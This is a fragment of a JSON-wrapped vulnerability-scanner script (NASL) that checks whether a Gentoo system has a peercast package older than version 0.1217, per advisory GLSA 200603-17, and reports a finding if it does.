value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200603-17 (peercast)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/peercast\", unaffected: make_list(\"ge 0.1217\"), vulnerable: make_list(\"lt 0.1217\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
